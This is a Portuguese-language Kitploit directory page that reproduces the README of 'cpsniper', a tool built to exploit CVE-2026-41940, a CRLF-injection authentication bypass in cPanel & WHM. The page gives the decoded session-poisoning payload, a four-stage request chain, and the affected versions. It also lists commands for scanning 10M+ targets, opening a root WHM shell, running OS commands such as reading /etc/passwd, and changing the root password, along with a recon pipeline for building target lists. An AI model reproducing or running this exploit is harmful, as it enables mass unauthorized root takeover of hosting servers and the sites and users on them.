Skip to content
KitploitKITPLOIT
FerramentasExploitsBlog
Log in
Enviar
FerramentasExploitsBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

FeedsContatoPrivacidade© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
cpsniper — cPanelSniper ESTÁVEL - CVE-2026-41940 otimizado para 10M+ alvos | Kitploit
Ferramentas/GitHubGitHub/44pie/cpsniper
Autenticação e AutorizaçãoScanners de VulnerabilidadesExploraçãoExploração de Aplicações WebPós-ExploraçãoTestes de PenetraçãoComando e ControleRed Teaming
GitHub44pie/cpsniper

cpsniper

cPanelSniper ESTÁVEL - CVE-2026-41940 otimizado para 10M+ alvos

Ver Repositório
221há 4 mesesAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

cPanelSniper

cPanelSniper

Python CVE cPanel stdlib pipeline Author

CVE-2026-41940 — Bypass de Autenticação do cPanel & WHM via Injeção CRLF em Arquivo de Sessão
Cadeia de exploração em 4 estágios · Shell WHM Interativo · VERDADEIRAMENTE ESTÁVEL para 10M+ alvos · Zero uso de memória · apenas stdlib


Visão Geral

cPanelSniper é um framework de exploração focado em CVE-2026-41940, uma vulnerabilidade crítica de bypass de autenticação que afeta cPanel & WHM. A vulnerabilidade permite que atacantes remotos não autenticados obtenham acesso WHM de nível root injetando sequências CRLF no arquivo de sessão por meio do cabeçalho HTTP Authorization — sem nenhuma credencial válida.

  • Pontuação CVSS: 10.0 (Crítico)
  • Exploração ativa: Confirmada (abril de 2026)
  • Instalações afetadas: ~70 milhões de domínios executando cPanel & WHM
  • Sem dependências: Apenas stdlib Python puro — sem pip, sem requests, sem pacotes externos

Somente para testes de penetração autorizados e programas de bug bounty.


⚡ VERSÃO VERDADEIRAMENTE ESTÁVEL

Esta versão é otimizada para escanear 10.000.000+ alvos com ZERO uso de memória.

O Que Foi Corrigido

ProblemaVersão OriginalVersão Corrigida
Uso de MemóriaCarrega todos os alvos na RAMTransmite alvos linha por linha (0 memória)
10M AlvosOOM → Encerrado ❌Conclui com sucesso ✅
RetomadaNão suportadaFlag --resume
ProgressoSem ETAETA em tempo real + taxa + estatísticas
ResultadosSalvos apenas no finalSalvos a cada 60s (configurável)

Principais Recursos

  • Arquitetura de streaming - Processe 10M+ alvos sem carregar na memória
  • Zero travamentos por OOM - Mesmo com listas de alvos muito grandes
  • Retomada automática - Continue de onde parou com --resume
  • Progresso em tempo real - ETA, taxa de varredura, rastreamento de erros
  • Salvamentos periódicos - Resultados salvos automaticamente para evitar perda de dados
  • Pronto para pipeline - Funciona perfeitamente com subfinder, httpx, shodan

Como Funciona

A causa raiz está em Session.pm: a função saveSession() chama filter_sessiondata() depois de gravar o arquivo de sessão no disco. Isso significa que caracteres CRLF incorporados no valor do cabeçalho Authorization: Basic são gravados literalmente no arquivo de sessão, injetando campos controlados pelo atacante antes da sanitização ocorrer.

Fluxo normal:
  POST /login/ → filter_sessiondata() → gravar sessão → verificação de auth

Fluxo vulnerável:
  POST /login/ → gravar sessão (payload CRLF injetado) → filter_sessiondata() → verificação de auth lê arquivo envenenado

O Payload CRLF

O valor Authorization: Basic decodifica para:

root:x
successful_internal_auth_with_timestamp=9999999999
user=root
tfa_verified=1
hasroot=1

Esses campos são gravados diretamente no arquivo de sessão no disco. Quando lidos de volta, o cPanel trata a sessão como uma sessão root totalmente autenticada.

Cadeia de Exploração em 4 Estágios

┌─────────────────────────────────────────────────────────────┐
│  Estágio 0 — Descoberta do Hostname Canônico                │
│  GET /openid_connect/cpanelid → 307 → hostname real         │
├─────────────────────────────────────────────────────────────┤
│  Estágio 1 — Criar Sessão Pré-Auth                          │
│  POST /login/?login_only=1  (credenciais erradas)           │
│  ← 401 + cookie whostmgrsession                             │
├─────────────────────────────────────────────────────────────┤
│  Estágio 2 — Injeção CRLF                                   │
│  GET / + Cookie: session + Authorization: Basic <payload>   │
│  cpsrvd grava campos CRLF no arquivo de sessão              │
│  ← 307 Location: /cpsessXXXXXXXXXX/...                     │
├─────────────────────────────────────────────────────────────┤
│  Estágio 3 — Propagar (gadget do_token_denied)              │
│  GET /scripts2/listaccts                                    │
│  Aciona flush raw→cache — campos injetados tornam-se ativos │
│  ← 401 Token negado (esperado)                              │
├─────────────────────────────────────────────────────────────┤
│  Estágio 4 — Verificar Acesso Root WHM                      │
│  GET /cpsessXXXXXXXXXX/json-api/version                     │
│  ← 200 {"version":"11.x.x.x","result":1}  = PWNED          │
└─────────────────────────────────────────────────────────────┘

Versões Afetadas

BranchVulnerávelCorrigida
110.x≤ 11.110.0.9611.110.0.97
118.x≤ 11.118.0.6211.118.0.63
126.x≤ 11.126.0.5311.126.0.54
132.x≤ 11.132.0.2811.132.0.29
134.x≤ 11.134.0.1911.134.0.20
136.x≤ 11.136.0.411.136.0.5

Instalação

git clone https://github.com/44pie/cpsniper
cd cpsniper
python3 cPanelSniper.py --help

Nenhuma instalação via pip necessária. Apenas stdlib Python 3.8+.


Uso

Varredura Básica

# Alvo único — apenas varredura
python3 cPanelSniper.py -u https://target.com:2087

# Alvo único — shell interativo após bypass
python3 cPanelSniper.py -u https://target.com:2087 --action shell

# Lista grande de alvos — 10M+ alvos (VERDADEIRAMENTE ESTÁVEL)
python3 cPanelSniper.py -l targets.txt -t 50 -o results.json

# Retomar varredura interrompida
python3 cPanelSniper.py -l targets.txt -t 50 -o results.json --resume

Ações Pós-Exploração

# Listar todas as contas cPanel no servidor
python3 cPanelSniper.py -u https://target.com:2087 --action list

# Executar comando do SO
python3 cPanelSniper.py -u https://target.com:2087 --action cmd --cmd "id;whoami;uname -a"
python3 cPanelSniper.py -u https://target.com:2087 --action cmd --cmd "ls /home"
python3 cPanelSniper.py -u https://target.com:2087 --action cmd --cmd "cat /etc/passwd"

# Obter informações do servidor (hostname, carga, disco, host MySQL)
python3 cPanelSniper.py -u https://target.com:2087 --action info

# Obter versão do cPanel
python3 cPanelSniper.py -u https://target.com:2087 --action version

# Alterar senha do root
python3 cPanelSniper.py -u https://target.com:2087 --action passwd --passwd 'NewPass@2026!'

# Shell WHM interativo
python3 cPanelSniper.py -u https://target.com:2087 --action shell

Pipelines (VERDADEIRAMENTE ESTÁVEL para Listas Grandes)

# subfinder → httpx → salvar em arquivo → escanear 10M+ alvos
subfinder -d target.com -silent | \
  httpx -silent -ports 2087,2086 -threads 50 > targets.txt
python3 cPanelSniper.py -l targets.txt -t 50 -o results.json
Baixar ferramenta